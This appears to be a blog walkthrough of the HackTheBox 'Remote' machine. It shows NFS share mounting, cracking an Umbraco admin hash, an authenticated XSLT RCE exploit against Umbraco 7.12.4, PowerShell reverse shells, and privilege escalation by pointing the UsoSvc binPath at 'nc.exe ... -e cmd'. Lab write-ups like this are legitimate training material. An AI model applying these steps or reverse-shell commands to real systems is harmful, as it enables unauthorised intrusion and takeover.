Remote HackTheBox Walkthrough

As always we are going to start of with a nmap scan of the box to find the services that are running

Looking at the nmap scan results we have a few ports open

First we see FTP has anonymous login allowed let’s what we can get off of it

Doing a directory listing we see that it really has nothing useful. Next i decided to enumerate HTTP. Opening the webpage using Mozilla we see a standard webpage and it appears to be a content management system

Scrolling through the webpages we see it an Umbraco instance i decided to click around and see if i could find anything meaningful and one thing stood out

The way a URL parameter was calling the webpages to be displayed

I decided to test for LFI(Local File Inclusion) but i didn’t get anything meaningful after a short time i decided to just keep it in my mind and if i get stuck i could revisit it again.

Next i decided to do a directory brute forcing using a gobuster and a targeted wordist found in seclists. Gobuster is a Directory/file & DNS busting tool written in Go it’s a tool used to brute-force URIs including directories and files as well as DNS subdomains

Looking at the result we see that we have few directories coming back so let’s take a look at one of them

/umbraco redirects us to a login page but we don’t have any credentials

Next i decided to try dump credentials for the login page such as:

1. admin@remote.htb:admin
2. admin@remote.htb:password
3. guest@remote.htb:guest

But always got a login failure

But going back to our nmap scan we see that SMB was enabled i decided to try and see if guest authentication was enabled using both smbclient and smbmap. These are tools in linux designed to interact with samba shares

But looking at the above screenshot i got authentication error. Now i had hit a dead end and i decided to do a full port and see if i might have missed anything

Looking at the full port result we see port 2049 is open which runs NFS

I decided to see what shares was accessible to us using the showmount command in Linux

Looking at the results we see that we have access to site_backups share since as you see it’s accessible to everyone

I decided to mount the share so that i could have a look at the files

first i made a directory called mount

Next i mounted the share using the command below

sudo mount -t nfs -o vers=2 10.10.10.180/site_backups $(pwd)/mount

Doing a directory listing we see all the files and it looks like the Umbraco CMS site backup. Sweet!!!!

Every user information is stored in the App_Data directory i decided to navigate to it since user information almost always include credentials

The file that really stood out to me was the umbraco.sdf file since it’s a database file i knew these by looking at umbraco forums

i decided to copy it to my box and then ran strings against it and i found really useful information. We have a bunch of emails. This is possible because the database is not encrypted

Looking at the above screenshot we see some couple of potentials emails

1. admin@htb.local
2. smith@htb.local

Also doing a head command on that same Umbraco.sdf file we see some string which looks like a sha1 hash

b8be16afba8c314ad33d812f22a04991b90e2aaa

So i decided to copy it to my local box and try seeing if i could crack the hash using hashcat

But first i tried to identify exactly what type hash it could possibly be by using hash-identifier i had made an educated guess it could be a sha1 hash since it was 40 character

Hash-identifier was able to identify it to be a sha1 hash and it’s mode 100 when we look at hashcat — example-hashes output

Let’s get cracking with hashcat

My Laptop specs are low but after about 30 sec the hash was cracked

As you see in the above image the password is

baconandcheese

Now we have one valid credentials

admin@htb.local:baconandcheese

Let’s go back to the login page of umbraco and see if we can login to the CMS

After filling in the details and clicking the login button

We get logged in immediately

My next instinct was to try and determine the exact version of umbraco running

Pressing the help button we get to see the exact version of umbarco running which is

Version: 7.12.4

Next i decided to do a searchsploit since i knew the box was centered around an exploit. Searchsploit is a database containing open source exploits for various softwares

Looking at the output of searchsploit we see that our exact version is vulnerable to an authenticated remote code execution vulnerability

So i copied the exploit to my working directory

Then i executed the script and got a bunch of errors

So i decided to debug the script which was easy in my opinion and got it to work

But we are not getting any output just a message saying start and end

But let’s try to explain the exploit a bit the xslt payload specifically

From the above screenshot you can see that proc.StartInfo.FileName will call the executable and the arguments you’ll pass the executable are defined in proc.StartInfo.Arguments. Sweet!!!

Now i decided to see if i could add a bit more spice to the exploit which would allow us to execute command from the terminal since this vulnerability is not a blind remote code execution vulnerability meaning we have output. The problem is the output of the command we ran is in between the noise. So i messed with the script a a bit more and the results are as you see below

As you can see above we can execute multiple command without us actually having to interact with the source code of the application Just imported regular expression module and it did the trick it filtered the noise out and returned only the output of the command we were running. Now we have a way to execute code on the system let’s get a shell on the box using nishang reverse shells

I copied nishang reverse shell to my current working directory

Then edited the IP address and port to connect to by adding the following one line at the bottom of the script

Next i hosted a simple HTTP Server this will allow the shell to be downloaded from our box then when executed it will give us a reverse shell

Next i did set up a netcat listener on port 9001. The same port we had specified on the power shell reverse shell

Next i executed the powershell command that would download the powershell reverse shell and also execute it

After executing the script going back to the server we see that the reverse shell had been downloaded

And going back to the netcat listener we had a shell on the box

Sweet now we are on the box.

First we have to login to the content management system(CMS) first

Next we have to navigate to the vulnerable URL

Next i clicked visualize XSLT and intercepted the request using burpsuite

Next i sent the request to the repeater tab

And i went back and analyzed the python exploit source code

The payload is defined in a variable meaning it is used somewhere else in the script

I continued analyzing the script

And found where the variable had been declared

The payload was used in a post parameter called

xsltSelection

Next i added the payload in the same spot in my repeater request

Looking at the payload it will call powershell.exe and then execute a ping command which will ping my box

Before executing the request i did set up a netcat listener

Then executed the script going back to my tcpdump listener you can see that i got a callback

And looking at the output of the request we see that the command output is also seen

This is what made me modify the script since i could get an output of the command

Now you can use the same method to get a shell on the box using burpsuite i just used ping as a proof of concept(POC)

But enough of that let’s get back to doing the box

We already got a shell

Going to users public folder we have the user.txt flag

Now you can submit it to HackTheBox to show you have completed the user challenge

Now we have to escalate to root on the box. I decided to run a script called powerUP which automatically checks for privilege escalation vectors

First I downloaded powerUP to the box

To execute the script i used the command

Invoke-AllChecks

I did let the program run till when it had finished and decided to go though the output

One information really stood out

We can start and stop Usosvc service and we can also edit the config files

And what’s even better is that powerUP was kind enough to give us a command to run this will allow us to escalate our privileges

On running the command we are given another command we are supposed to run

On running the command it will create a new user called john and the user will have admin privileges

But i opted against using this method of creating a new user on the box and decided to upload a netcat reverse shell to the box using the script i had customized

First i did set up a web server

Next i used Invoke-WebRequest a powershell one liner to download netcat on the box

Next i edited the service Usosvc. Actually this vulnerability is a CVE and PayloadAllTheThings gives a good article on how to exploit the service

After i had downloaded the netcat reverse shell i stopped the service first before editing it using the command

sc.exe stop UsoSvc

Next i edited the service and tricked it to think that the binary path for the program was the netcat reverse shell i had downloaded on the box

The command that i used was

sc.exe config usosvc binPath="C:\users\public\nc.exe 10.10.14.124 9001 -e cmd"

And as you can see from the above screenshot the service configuration has been changed successfully

Now i queried the service again to make sure that the changes had been implemented

As you can see the binary path has been changed successfully

Next i did set up a netcat listener using the same port i had specified in the Usosvc service config

Then i started the service again using the command

sc.exe start UsoSvc

And going back to my netcat listener we had a shell as administrator on the box

Navigating to the Desktop’s folder of administrator we have the root flag and we can view

And the box is pretty much done. That was fun and i actually like it since the scenario is somewhat realistic i also loved modifying the script

As i always say coding is FUN and with practice you get good at it

I haven’t really gone into details in exploit development part (how i modified the python script and the lines of code i added) but in the coming week i might be releasing a 3 minute writeup on how i modified the script but that’s it for now folks till next time it’s goodbye

If you liked the walkthrough you can clap for me down below and follow me so that you don’t miss any upcoming articles

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store